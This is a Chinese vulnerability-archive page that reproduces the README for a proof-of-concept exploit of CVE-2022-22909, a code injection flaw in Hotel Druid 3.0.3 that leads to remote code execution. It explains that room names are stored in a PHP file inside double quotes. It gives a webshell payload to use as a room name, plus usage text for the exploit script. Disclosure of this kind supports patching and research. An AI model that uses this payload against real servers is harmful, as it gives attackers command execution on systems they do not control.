关联漏洞
描述
Hotel Druid 3.0.3 Code Injection to Remote Code Execution
介绍
# CVE-2022-22909
## Description
A Code Injection vulnerability has been found on the `Hotel Druid v3.0.3` application, which an attacker could exploit to execute remote code on the server.
**For a successful exploitation, an attacker should have the privilege to add a new room.**
## Vulnerability description
The vulnerability occurs because room names are getting stored inside a file named `/dati/selectappartamenti.php` using **Double Quotes**.
```php
<?php
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>
```
## Payload
To perform a successful exploitation, add a room with the following payload as room name.
```php
{${system($_REQUEST[cmd])}}
```
After adding a new room, go to `/dati/selectappartamenti.php` and trigger the webshell by passing a command using the `cmd` parameter.
## Usage
```
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]
optional arguments:
-h, --help show this help message and exit
required arguments:
-t TARGET, --target TARGET
Target URL. Example : http://10.20.30.40/path/to/hoteldruid
-u USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
password
--noauth If No authentication is required to access the dashboard
```
## Example
If the application has no authentication.
Use the `--noauth` flag to perform no authentication.

If the server has authentication enabled, use the `--username` and `--password` to perform authentication.

## Credits
Researcher and POC writer - [0z09e](http://twitter.com/0z09e)
***
文件快照
[4.0K] /data/pocs/a015b18c866e525dd18490231b6c8f9a25a124c4
├── [5.7K] exploit.py
├── [4.0K] img
│ ├── [ 51K] Pasted image 20220217230935.png
│ ├── [ 52K] Pasted image 20220217231404.png
│ └── [ 18K] Pasted image 20220217232112.png
├── [ 34K] LICENSE
└── [1.8K] README.md
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。